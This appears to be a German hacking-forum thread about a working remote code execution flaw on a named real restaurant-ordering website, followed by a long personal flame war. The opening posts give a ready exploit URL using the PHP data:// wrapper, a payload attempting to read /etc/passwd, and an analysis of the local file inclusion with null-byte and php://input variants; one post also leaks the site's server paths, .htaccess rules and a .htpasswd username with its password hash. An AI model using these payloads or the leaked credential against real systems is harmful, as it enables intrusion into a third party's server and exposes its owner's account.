Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

pizza-max.net - Remote Code Execution mit php-Wrapper

- - - - -

  • Bitte melde dich an um zu Antworten
10 Antworten in diesem Thema

#1
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    129
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
Folgendes eingeben:

http://www.pizza-max.net/index.php?data://text/plain,<? phpinfo(); ?>


#2
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    218
  • 223 Beiträge
  • 193 Bedankt
Ist denn der MIME Type von PHP nicht text/html? - Egal, funktionieren tuts trotzdem :D

#3
XoiL

XoiL

    Leecher

  • Banned
  • PIP
  • Likes
    2
  • 1 Beiträge
  • 14 Bedankt
  • Android [root], Blackberry
  • Linux
@ProHax

fundamentiertes Halbwissen ist hier nicht angebracht.
MIME steht für Multipurpose Internet Mail Extensions
und die angabe, was der webserver für daten zurückgibt, ist in dem zusammenhang scheissegal, und wenn man img/jpeg angeben würde ....
und auch wenn man php zum coden von dynamischen Pages used .... hat php an sich nix mit html code zu tun, ausgenommen der tatsache, das es used wird um html-code zu erzeugen .... wobei html wieder ne eigene scriptsprache ist.
Lern mal die Baiscs du Pfosten und versuch nicht immer auf dicke Hose zu machen. Wenn man nix weiss, sollte man nicht versuchen wissen vorzugaukeln ..... epic fail. seit jahren bekommst in die fresse deshalb ... unter jedem nick ..... irgedwann muss doch mal n hauch intelligenz ansetzen, oder?

@Thread
<b>Warning</b>: system() has been disabled for security reasons in <b>data://text/plain,%3C?%20system%28%27echo%20%2fetc%2fpasswd%27%29;%20?%3E.inc</b> on line <b>1</b><br />
Braucht man nicht weiter probieren.
  • Dr. Spic gefällt das

#4
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    218
  • 223 Beiträge
  • 193 Bedankt
@ Xoil - Du weißt schon dass du nur gequirrlte scheiße laberst gerade? Bevor du von basics anfängst solltest du mal ein fundamentiertes Grundwissen vorweisen, dass du nicht hast und so wie du dich aufführst auch nie haben wirst. Punkt.

@ Threadstarter - darf ich den mist shellen? :D

#5
Illuministrator

Illuministrator

    Lamer

  • Banned
  • PIPPIPPIP
  • Likes
    16
  • 24 Beiträge
  • 5 Bedankt
  • verifiziert

@ Xoil - Du weißt schon dass du nur gequirrlte scheiße laberst gerade? Bevor du von basics anfängst solltest du mal ein fundamentiertes Grundwissen vorweisen, dass du nicht hast und so wie du dich aufführst auch nie haben wirst. Punkt.


Ich sagte dir mal vor etwa 2 Jahren, als mich gefragt hattest, ob ich dir was beibringen könnte, das du bevor ich überhaupt darüber nachdenke du erstmal die basics lernen solst. Aufgrund der qualität deiner Aussagen hier bin ich beruhigt, das sich daran noch NICHTS geändert hat. Das ist ne standard LFI mit der möglichkeit direkt via der lfi php-code zu executen. mit dem MIME-Type hat das hier gar nichts zu tun, aber wenn man Halbwissen mit dem Drang danach kombiniert sich zu profilieren, kommt nur Dünnpfiff dabei raus. Deine Aggrssivität und beleidigungen wenn jemand was gegen deine Aussage schreibt sind vom Niveau her ziemlich flach.
Fakt in diesem Fall ist, das der Threadersteller hier ne Vuln posted, die in dem Kontext relativ selten zu finden ist oder besser ausgedrückt selten used wird. Du asoziierst das mit dem MIME-Type, der in diesem zusammenhang noch nicht mal Ansatzweise damit zusammenhängt. Würdest du versuchen die vuln zu verstehen, würden solch falsche Aussagen nicht von dir kommen. Habe ich aber schonmal vor 2 Jahren zu dir gesagt.
Damit du mal von deinem Trip runter kommst und nicht och mehr personen, die dich mit Fakten kritisieren meinst runter zu machen, hier mal ne kurze Analyse der Vuln:

http://www.pizza-max.net/index.php?blabla%00

Im Content fondet man nun:

<b>Warning</b>:  include() [<a href='function.include'>function.include</a>]: Failed opening 'blabla%00.inc' for inclusion (include_path='.:/usr/share/php:..') in <b>/www/htdocs/w00ac38a/index.php</b> on line <b>12</b><br />

Also eine typische LFI. durch das "data://" verwendet man einen Wrapper, der Daten als inputstream used. man hätte genausogut hingehen können und den request zu nem POST machen und dann "php://input" als wrapper usen können, sofern man durch n NULLBYTE das angehangene ".inc" wegargumentiert.

Wie man sieht wird alles, was nach dem "?" in der URL steht als Fileangabe für dden include befehl interpretiert. durch falsches maskieren ist durch php-input-wrapper eine direkte RCE möglich. Grund hierfür ist die .htaccess im docroot:

.htaccess (absoluter Pfad: /www/htdocs/w00ac38a/.htaccess)

dort finden wir die rewrite-rule, welche uns zusätzlich sogar verrät, wie man weitere vulns etc usen kann (RFI sollte ebenfalls möglich sein, habe ich aber noch nicht getestet, deshalb unter vorbehalt):

RewriteEngine On
#RewriteCond %{QUERY_STRING}   (.*)=http(.*)   [NC,OR]
RewriteCond %{QUERY_STRING}   (.*)http(.*)   [NC,OR]
RewriteCond %{QUERY_STRING}   (.*)=ftp(.*)   [NC,OR]
RewriteCond %{QUERY_STRING}   (.*)urlx=(.*)   [NC]
RewriteRule ^(.*)  - [F]

hier paar zusatzinfos:
cgi-bin/sysinfo/.htaccess
->
AuthUserFile /www/htdocs/w00ac38a//cgi-bin/sysinfo//.htpasswd
AuthGroupFile /dev/null
AuthName ByPassword
AuthType Basic
<Limit GET POST>
require user w00ac38a
</Limit>

cgi-bin/sysinfo/.htpasswd
->
w00ac38a:$1$76Gqrill$PTaCdwqw3BZD7ZHrWWecF0

ich denke jemand sollte hier seine Aussagen mal starl überdenken und effektiv mal aufhöhren auf dicke Hose zu machen, da er XoiL ne Entschuldigung schuldig ist.

@ Threadstarter - darf ich den mist shellen? :D


Das ist n Witz, oder? Bei ner RCE shellen, wo doch die RCE selber schon eine shell ist?
Bei der Fachkompetenz auf deiner Seite, wo du obwohl vom Threadstarter schon die phpinfo direkt geliefert bekommen hast, wudert mich sowas aber nicht. Mal sehen wie lange du brauchst, um zu merken, das fast alle möglichkiten shell-befehle aufzurufen deaktiviert sind (was schwarz auf weiss in der phpinfo steht). Shell ist zwar möglich, bzw. liessen sich diese restriktionen umgehen, aber so wie die gessamte vuln von dir misverstanden wurde, zweifel ich mal einfach daran, das dein versuch ein erfolg wird. per php dir-listings oder files auslesen ggf auch schreiben, aber mehr denke ich bekommst da nicht zu stande.


Tu mir und der Communiy nen gefallen:
1. Höhr auf fundamentiertes Halbwissen als godlike Skill dar zu stellen, das hilft Neulingen effektiv nicht!
2. Lern mit Kritik umzugehen und lass die Beleidigungen und Aggressivität raus, wenn dein Gegenüber Recht hat .... Fakten nicht zuzulassen, weil sie gegen einen arbeiten ist ignorant und kleingeistig
3. Fang mal an den Basics an, dann verstehst du vulns auch ... ist deprimierend soche Fails von dir am laufenden meter zu lesen. (Falls das in Frage stellst, einfach an Bitte 1 und 2 nicht halten, ich schreib dir dann sofern es meine Zeit zuöässt unter ale fails von dir einen entsprechenden Text, ähnlich dem Text hier)

und als 4. Punkt als zusatz:
4. Spar dir den Versuch mich als Arrogant oder sonstwas hinzustellen, sagte dir damals schon:
"Skill sieht nur von unten aus wie Arroganz"
  • Dr. Spic, Ch!ller, XoiL und 4 anderen gefällt das

Thanked by 3 Members:
Cyber-Agent , Becks , Dr. Spic

#6
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    218
  • 223 Beiträge
  • 193 Bedankt

4. Spar dir den Versuch mich als Arrogant oder sonstwas hinzustellen, sagte dir damals schon:
"Skill sieht nur von unten aus wie Arroganz"


Und das von jemandem der Acunetix scans auf bitcoincasinos machte um sich mit den "lücken" sein konto zu füllen.

Whatever, bevor du mich hier weiter volllaberst, dein "Skill" liegt auch nur im dumm reden, oder etwa nicht? :)

#7
Illuministrator

Illuministrator

    Lamer

  • Banned
  • PIPPIPPIP
  • Likes
    16
  • 24 Beiträge
  • 5 Bedankt
  • verifiziert
Woher willst du wissen ob ich Accunetix use? zu deiner Enttäuschung muss ich sagen, nein ich use kein Acccunetix, aber war ein netter Versuch. Können genug Leute bestätigen, das ich primär self-coded Scanner/Tools use. Also Probiers nochmal. Als Rat am Rande: Probiers mal mit Fakten, hilft ungemein weiter, wenn man sich auf Tatsachen beruft. Wenn man einen vor den Bug bekommt, ist noch lange kein Grund Unsinn in der Weltgeschichte zu verbreiten.
Also, neue Runde, neue Chance, diesmal mit Niveau, pls!

#8
FalkE

FalkE

    1337

  • Banned
  • PIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    4
  • 349 Beiträge
  • 79 Bedankt
  • Android [root]
  • Linux

Und das von jemandem der Acunetix scans auf bitcoincasinos machte um sich mit den "lücken" sein konto zu füllen.

Whatever, bevor du mich hier weiter volllaberst, dein "Skill" liegt auch nur im dumm reden, oder etwa nicht? :)

ich drücke mich wenn es um eines deiner missverständnisse hier auf toolbase geht, immer sehr freundlich und dezent aus.
aber (auch wenn mich diese "diskussion" hier nicht betrifft) jetzt ist mal schluss hier!

anscheinend ist die arroganz dir angeboren. egal wieviele fakten auf dem tisch liegen die dein unwissendes gelaber offenbaren und egal wieviele namenhafte leute (und wir sprechen hier von illuministrator) dir versuchen sachlich und respektvoll zu formulieren was du falsch verstehst/falsch gemacht hast. du antwortest arrogant, stichelnd mit irgendwelchen herbeigezogenen argumenten. dein ruf ist in kellertiefen trotzdem versucht jeder hier auf ein freundliches miteinander zu setzen und lässt die für prohex charakteristischen stichworte: "unfähig", "schwätzer" und "arrogant" aus.

du suchst dir gründe und gegnerbezug weil du unfähig bist deine unwissenheit zu akzeptieren. selbst unnex dein achso toller "mentor" musste damals dein kiddyforum (prohex crew :D war es glaube ich) defacen damit du auf dein eigentliches level findest und mit dieser schandhaften prahlerei aufhörst.

du wurdest auf uc gebannt, hast dich dort mit allen membern angelegt und jetzt geht es hier weiter. unwissen die fresse öffnen und leute ankreiden die mehr wissen als du jemals wissen wirst. du stagnierst und meinst du bist der große 13speedtest37 der die foren auseinandernimmt, ein wiederspruch insich.

ich lese sowas und mir wird schlecht:
"1337 | hacked by prohex ihr noobs" (nach seinem fund einer reflected xss auf UC)

du bist der inbegriff eines kiddys. javascript wird clientseitig ausgeführt, dementsprechend hackst du dich selbst und nicht UC..
du wendest an ohne zu wissen was du eigentlich genau machst. du mischst das eine mit dem anderen weil es für dich sinn macht, im anschluss versuchst du diesen standpunkt und dein halbwissen zu verteidigen, wirst persönlich und fängst an zu flamen, das maßgeschneiderte kiddy..


vote 4 ban damit die (geschlossene) community endlich mal ruhe vor diesem bengel hat.

#9
most_uniQue

most_uniQue

    AV Agent

  • Premium Member
  • Likes
    228
  • 478 Beiträge
  • 500 Bedankt
  • iPhone
  • Windows, Linux, Mac OS
@ FalkE besser kann man es nicht sagen...

Eingefügtes Bild


#10
Illuministrator

Illuministrator

    Lamer

  • Banned
  • PIPPIPPIP
  • Likes
    16
  • 24 Beiträge
  • 5 Bedankt
  • verifiziert
Stimme dem ganzen zu, jedoch würde ich von nem ban absehen. Einfach deshalb weil jeder ne Chance verdient hat. Einige brauchen weniger, andere mehr edukative Maßnahmen, um zur vernunft zu kommen. Auch wenn meine Formulierungen in Kombination mit den Fakten sehr hart klingen/erscheinen, jedoch ist ein ban nie ziel dessen gewesen, sondern eher, das vernünftig miteinander umgegangen wird und was noch viel wichtiger ist, Neulinge, die gerade dabei sind sich Wissen anzueignen nicht in eine Sackgasse laufen, wenn sie die Methoden/Hacks von Prohex als 100% korrekt annehmen. Das sowas in unnötig lange Recherchen ausarten kann, warum ein Hack nicht funktioniert kann man sich ersparen.
Deshalb von meiner Seite aus ein klares "vote GEGEN einen ban", unabhängig wie der weitere Verlauf hier sein sollte.
Ich persönlich bin ja über die Aussagen von Prohex was mich persönlich angeht überaus amüsiert. Vor allem da ich ja laut seiner Aussage Windows-Tools/Scanner use (Accunetix laut seiner Aussage) .... er hätte es von früheren Gesprächen wissen müssen ... hab ihm persönlich schon vor 2 Jahren ausdrücklich gesagt, das Accunetix unter Linux nicht wirklich läuft und ich davon nix halte.... aber merkt er bestimmt noch das ich Linux-User bin .... irgendwann .....
Trotz alledem ist Fakt, das durch diese persönlichen Angriffe auf User diese oftmals kleinbei geben. sei es aus verzweiflung, wie resistent manche leute gegen saubere argumente sind, oder aber weil sie angenervt sind, oder durch etliche andere Gründe ... Endeffekt ist, das man dadurch eher ein solches verhalten fördert. Dagegenhalten ist effektiv die einzige Methode so einem verhalten bei zu kommen.

Und seien wir mal alle ehrlich zueinander, keiner hier ist unfehlbar, Fehler können jedem passieren. Man sollte aber die Kritikfähigkeit besitzen, damit umzugehen, und nicht die Leute beleidigen/angreifen nur damit die eigene Falschaussage als Fakt erhalten bleibt. Im Falle von Prohex ist dies leider mittlerweile eher chronisch der Fall.

Wenn man sich Prohex aussage ansieht erkennt man ja deutlich, das er gegen den Part meines Posts, der reine Fakten enthielt weder eingegangen ist, noch irgendwie dagegen argumentiert hat. blieb halt bei nem kläglichen Versuch mich zu denunzieren .... darf er ja versuchen, kann mich nicht treffen, da keine Fakten in seiner aussage vorhanden sind, wobei ich gerade stark überlege woher man auf die Idee kommt, das ich gegen Bitcoincasinos marschiert bin .... eriner mich spontan nur an ne Zeit, als Exchanger interessant waren und ich einge Exchanger komplett dumped hab .... was aber nie public gemacht wurde .... naja, ich denke mal, das er mal wild geraten hat, was sich als target lohnen würde oder aber seine arbeitsweise mit meiner gleichgestellt hat. Nun, war ja belustigend zu lesen ....

@ FalkE : Danke, so aussagen, gehen runter wie Öl, aber wie ich schon vor einiger Zeit zu Chiller sagte: "Ich schwitz beim kacken genauso wie jeder andere auch!" Auch wenn ich ggf. einige Jahre Erfahrung mehr als andere auf dem Buckel hab, bin ich weder was besseres, noch sind meine Aussagen unumstößlich. Wie schon erwähnt, Fehler können jedem unterlaufen und keiner kann sich davon frei sprechen. Also bitte nicht alle meine Fachbezogenen Aussagen als die Non-Plus-Ultra Aussage hinnehmen, sondern hinterfragen oder ggf. ungereimtheiten oder gar Denkfehler entsprechend kritisieren, pls, denn trotz über 15 Jahre prktischer Erfahrung gibt es immer noch Gebiete, in denen mein Wissen nicht ausreicht, denn um alles zu wissen, ist das Spektrum der Teilbereiche viel zu groß ;-)

Stimme dem ganzen zu, jedoch würde ich von nem ban absehen. Einfach deshalb weil jeder ne Chance verdient hat. Einige brauchen weniger, andere mehr edukative Maßnahmen, um zur vernunft zu kommen. Auch wenn meine Formulierungen in Kombination mit den Fakten sehr hart klingen/erscheinen, jedoch ist ein ban nie ziel dessen gewesen, sondern eher, das vernünftig miteinander umgegangen wird und was noch viel wichtiger ist, Neulinge, die gerade dabei sind sich Wissen anzueignen nicht in eine Sackgasse laufen, wenn sie die Methoden/Hacks von Prohex als 100% korrekt annehmen. Das sowas in unnötig lange Recherchen ausarten kann, warum ein Hack nicht funktioniert kann man sich ersparen.
Deshalb von meiner Seite aus ein klares "vote GEGEN einen ban", unabhängig wie der weitere Verlauf hier sein sollte.
Ich persönlich bin ja über die Aussagen von Prohex was mich persönlich angeht überaus amüsiert. Vor allem da ich ja laut seiner Aussage Windows-Tools/Scanner use (Accunetix laut seiner Aussage) .... er hätte es von früheren Gesprächen wissen müssen ... hab ihm persönlich schon vor 2 Jahren ausdrücklich gesagt, das Accunetix unter Linux nicht wirklich läuft und ich davon nix halte.... aber merkt er bestimmt noch das ich Linux-User bin .... irgendwann .....
Trotz alledem ist Fakt, das durch diese persönlichen Angriffe auf User diese oftmals kleinbei geben. sei es aus verzweiflung, wie resistent manche leute gegen saubere argumente sind, oder aber weil sie angenervt sind, oder durch etliche andere Gründe ... Endeffekt ist, das man dadurch eher ein solches verhalten fördert. Dagegenhalten ist effektiv die einzige Methode so einem verhalten bei zu kommen.

Und seien wir mal alle ehrlich zueinander, keiner hier ist unfehlbar, Fehler können jedem passieren. Man sollte aber die Kritikfähigkeit besitzen, damit umzugehen, und nicht die Leute beleidigen/angreifen nur damit die eigene Falschaussage als Fakt erhalten bleibt. Im Falle von Prohex ist dies leider mittlerweile eher chronisch der Fall.

Wenn man sich Prohex aussage ansieht erkennt man ja deutlich, das er gegen den Part meines Posts, der reine Fakten enthielt weder eingegangen ist, noch irgendwie dagegen argumentiert hat. blieb halt bei nem kläglichen Versuch mich zu denunzieren .... darf er ja versuchen, kann mich nicht treffen, da keine Fakten in seiner aussage vorhanden sind, wobei ich gerade stark überlege woher man auf die Idee kommt, das ich gegen Bitcoincasinos marschiert bin .... eriner mich spontan nur an ne Zeit, als Exchanger interessant waren und ich einge Exchanger komplett dumped hab .... was aber nie public gemacht wurde .... naja, ich denke mal, das er mal wild geraten hat, was sich als target lohnen würde oder aber seine arbeitsweise mit meiner gleichgestellt hat. Nun, war ja belustigend zu lesen ....

@ FalkE : Danke, so aussagen, gehen runter wie Öl, aber wie ich schon vor einiger Zeit zu Chiller sagte: "Ich schwitz beim kacken genauso wie jeder andere auch!" Auch wenn ich ggf. einige Jahre Erfahrung mehr als andere auf dem Buckel hab, bin ich weder was besseres, noch sind meine Aussagen unumstößlich. Wie schon erwähnt, Fehler können jedem unterlaufen und keiner kann sich davon frei sprechen. Also bitte nicht alle meine Fachbezogenen Aussagen als die Non-Plus-Ultra Aussage hinnehmen, sondern hinterfragen oder ggf. ungereimtheiten oder gar Denkfehler entsprechend kritisieren, pls, denn trotz über 15 Jahre prktischer Erfahrung gibt es immer noch Gebiete, in denen mein Wissen nicht ausreicht, denn um alles zu wissen, ist das Spektrum der Teilbereiche viel zu groß ;-)
  • Ch!ller gefällt das

#11
Dr. Spic

Dr. Spic

    31er

  • Members
  • PIP
  • Likes
    4
  • 0 Beiträge
  • 223 Bedankt
So nun debke ich dass es genig OT gewesen ist. Weitere Diskusionen bitte per PN oder in der "Gott und die Welt" Section.
Dankeschön.



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 79 user(s)


    , <Kevin>, 4cyberstudios, aaerix, AdlerRhy, akayoshi, B1nary, Backdoored, Bad Grandpa, Becks, biosmanp, BlackZetsu, bones, Born2Hack, Bot4ng, Bus1ness Junkie, CarlsWelt, Ch!ller, chimchoca7, clown1337, cooky1, corkscrew, curlz, Cyber-Agent, cyberrainalpha, daten, dev-0, Download305, Dr. Spic, easysurfer, Eester, eXalT, FalkE, FatalityMods, Framerater, FullMetall, gutzuu, holz96, Illuministrator, Imperial, Iron, jack4flash, kadama, kennydark, Korky, kotzbroedchen, kpakpando, Laggy, lion., mettbrot, most_uniQue, paulaner, pdr0, pornoralle, ProHex, S3lent, SAR, sash, Slixer, smc2014, Smokyjoe, Streetboz, Techret, tinarchin, Tortschi, trooperhdx, Twix2010, ueEqlL, Unkiii, vôl, weedneger, werewolf100, will, x4r4x, Xenio, xFAUSTx, xNominus, XoiL, Zero-X
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.